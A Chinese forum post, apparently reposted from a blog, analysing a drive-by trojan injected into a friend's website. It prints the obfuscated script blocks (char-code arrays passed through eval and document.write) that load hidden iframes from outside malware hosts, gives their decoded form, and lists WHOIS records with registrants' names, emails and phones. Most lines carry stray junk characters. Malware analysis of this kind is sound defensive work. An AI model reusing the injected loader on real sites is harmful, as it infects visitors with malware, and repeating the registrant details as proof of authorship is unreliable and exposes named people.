[原创]一篇刚写的分析木马手记

首发在我的博客里面， "ht2X w  
e94csTh=  
http://www.areway.cn/?p=175 \<z{@  
]q?<fEG2<  
cc^V~-ph  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： OK2wxf  
          e|kYu[^  
<script>t=’60,105,102,114,97,109,101, % mIq,  
32,115,114,99,61,104,116,116,112,58,47,47, beIEy(rA  
102,114,101,101,46,117,45,117,117,117,46,99, ]
.1R~7b  
110,47,101,114,114,111,114,46,104,116,109, 1P[!B[;c  
32,119,105,100,116,104,61,49,48,48,32,104, 4s$))x9p  
101,105,103,104,116,61,48,62,60,47,105,102, da2BQ;  
114,97,109,101,62′; 52%.^/  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> wPG3Ap8L  
                                                                                                  !J6k\$r  
<script>t=’60,105,102,114,97,109,101,32,115, Crey}A/N  
114,99,61,104,116,116,112,58,47,47,102,114, 4z$eT  
101,101,46,117,45,117,117,117,46,99,110,47, b9\=NdyCY  
101,114,114,111,114,46,104,116,109,32,119, lR-4"/1|y  
105,100,116,104,61,49,48,48,32,104,101,105, H ($=k-+5  
103,104,116,61,48,62,60,47,105,102,114,97, ~i(*.Z) \  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); 4Q!*h8O  
document.write(t);</script> Ig9$ PP+3  
                                                                                                  ^,`yt^^A  
<html xmlns=” I=lA
7}  
http://www.w3.org/1999/xhtml *J%
+zH  
“> fd)}I23Q'  
<head> R a9/L  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> (2a~gQGD  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> "2Ye\#BU6  
<title>首页 - 爱生活家庭网 X#Hs{J~@p  
                                                                                                                                                    kszYbz"  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 Li7/pUq>}!  
转换字符串后的大概内容是（谁点击后果自付）： LL:B H,[  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… -aec1+o  
                                                                                                                                  46$5f?Z  
查询玉米u-uuu.cn的详细信息： `Y'}\>.#  
Domain Name: u-uuu.cn @s@r5uR9B  
ROID: 20070901s10001s64972306-cn UDxfS4yI  
Domain Status: ok Pu}2%P)p  
Registrant Organization: 王雷 xEZvCwsb  
Registrant Name: 王雷 Wk$%0xZ7  
Administrative Email: czlovexs@126.com G2em>W_n  
Sponsoring Registrar: 北京万网志成科技有限公司 XLOk+Fn  
Name Server:ns.yovole.com 3:76x
 
Name Server:ns1.yovole.com %3~jg  
Registration Date: 2007-09-01 17:54 N b+zP[C  
Expiration Date: 2008-09-01 17:54 1s1$J2LX  
最后PING了一下地址 都没有什么…. /)v X|qtIY  
                                                                                                \bfNki  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. XV!P8n  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> :]?I|.a  
<script language=”javascript” src=” 7@06x+!  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script v/CX
X<^U(  
> K{"+eA>CU  
这个玉米应该有可能是木马作者的： `+i<:,z-gs  
foafau.info的详细信息： U${dWxC  
Access to INFO WHOIS information is provided to assist persons in *78TT\q<  
determining the contents of a domain name registration record in the .PF~8@1ju  
Afilias registry database. The data in this record is provided by m:K/)v*  
Afilias Limited for informational purposes only, and Afilias does not SVeL c  
guarantee its accuracy.  This service is intended only for query-based zvSf
W# *  
access. You agree that you will use this data only for lawful purposes 6LUB3;g7  
and that, under no circumstances will you use this data to: (a) allow, G0<m3 Up  
enable, or otherwise support the transmission by e-mail, telephone, or CbwQ'c$}  
facsimile of mass unsolicited, commercial advertising or solicitations C~kw{g+|  
to entities other than the data recipient’s own existing customers; or 6R"& !.ZF  
(b) enable high volume, automated, electronic processes that send EXo"F*gW  
queries or data to the systems of Registry Operator, a Registrar, or \GBv@  
Afilias except as reasonably necessary to register domain names or G;`+MgJ)  
modify existing registrations. All rights reserved. Afilias reserves |nv8&L8  
the right to modify these terms at any time. By submitting this query, _jP]ifu`  
you agree to abide by this policy. ](3=7!!J  
Domain ID:D22418703-LRMS -u8 ma%JW  
Domain Name:FOAFAU.INFO 6$`8y,TMSt  
Created On:20-Nov-2007 16:05:42 UTC ^Z;5e@S  
Last Updated On:20-Nov-2007 16:05:44 UTC
-k!UcMWP  
Expiration Date:20-Nov-2008 16:05:42 UTC 0urQA_JC  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) fF<~2MiKw  
Status:CLIENT DELETE PROHIBITED 4R}2H>VV%  
Status:CLIENT RENEW PROHIBITED z!?xz  
Status:CLIENT TRANSFER PROHIBITED $1/yc#w u  
Status:CLIENT UPDATE PROHIBITED ql^n=+U  
Status:TRANSFER PROHIBITED h\:"k_u#  
Registrant ID:GODA-040110615 7!z0)Ai_>=  
Registrant Name:liu hong qJrK?:O;  
Registrant Organization: 'BtvT[KM  
Registrant Street1:beijing j#.Aiy:,  
Registrant Street2: _18) XR  
Registrant Street3: dd_n|x1  
Registrant City:beijing i.6c;KU  
Registrant State/Province: UG 9uNgzQ/  
Registrant Postal Code:100000 %nT!u!#  
Registrant Country:CN 0<
nk>o  
Registrant Phone:+86.860108888777 1@;Dn'  
Registrant Phone Ext.: "){"{~  
Registrant FAX: P;][i|x  
Registrant FAX Ext.: $,F1E VJ  
Registrant Email:bbbshiji@163.com '\=aSZVO  
Admin ID:GODA-240110615 E%2]c?N5  
Admin Name:liu hong V+-%$-w>  
Admin Organization: FAo\`x  
Admin Street1:beijing Jro)  
Admin Street2: 8FU8E2zo  
Admin Street3: g \&Z_  
Admin City:beijing `l'z#\  
Admin State/Province: [Vc8j&:L  
Admin Postal Code:100000 1Sx2c  
Admin Country:CN RMDzPda.  
Admin Phone:+86.860108888777 !CY:XQm  
Admin Phone Ext.: ~"#qG6dP  
Admin FAX: 'HzF/RKh  
Admin FAX Ext.: 5{L~e>oS9  
Admin Email:bbbshiji@163.com <0T|RhbY  
Billing ID:GODA-340110615 6 -N 442  
Billing Name:liu hong :)p\a1I[*  
Billing Organization: 4*P#3 B'@V  
Billing Street1:beijing 2V:`':  
Billing Street2: !%?O`+r  
Billing Street3: *3d+ !#;rG  
Billing City:beijing :[kfWai#(  
Billing State/Province: GO2mccIB  
Billing Postal Code:100000 #Ipi3  
Billing Country:CN Vo"Wr>F  
Billing Phone:+86.860108888777 Z8%?ej`8  
Billing Phone Ext.: pE,2pT2>  
Billing FAX: d)1 d0ES  
Billing FAX Ext.: SFv'qDA  
Billing Email:bbbshiji@163.com 3f@@|vZF  
Tech ID:GODA-140110615 -U.>K,M  
Tech Name:liu hong 9sJ=Nldq  
Tech Organization: TkBHlTa"=  
Tech Street1:beijing gNUYHNzDM(  
Tech Street2: L 4V,y>  
Tech Street3: nl5A{ s
 
Tech City:beijing < KGq  
Tech State/Province: E2K{9@i  
Tech Postal Code:100000 _wH>h$E  
Tech Country:CN VkdGGY  
Tech Phone:+86.860108888777 VddHK  
Tech Phone Ext.: /W9(}Id6  
Tech FAX: R-LMV  
Tech FAX Ext.: >mJH@,F:  
Tech Email:bbbshiji@163.com q=(% ]BK  
Name Server:NS27.DOMAINCONTROL.COM & %A&&XT9  
Name Server:NS28.DOMAINCONTROL.COM 6I2`oag  
Name Server: eu={6/O
 
Name Server: FkE)~g  
Name Server: p>_Qns7W  
Name Server: & 6'Rc#\P  
Name Server: {ppzg
`G\  
Name Server: FJ,"a%m/Q  
Name Server: 'HKDGQl`  
Name Server: u}3D'h  
Name Server: Znr@-=xZO*  
Name Server: YLJ^R$pi  
Name Server: ckGmwYP9  
                                                                                                          6S`0<Z;;/  
接着下载每个文件里面的代码： hh8Gr
l;  
一步一步看.. ]-8WM5\qJM  
@@JyCUd  
*:bexDH  
P9`R~HO'`  
s@Dln Du.  
B6=
?Q
p/f  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来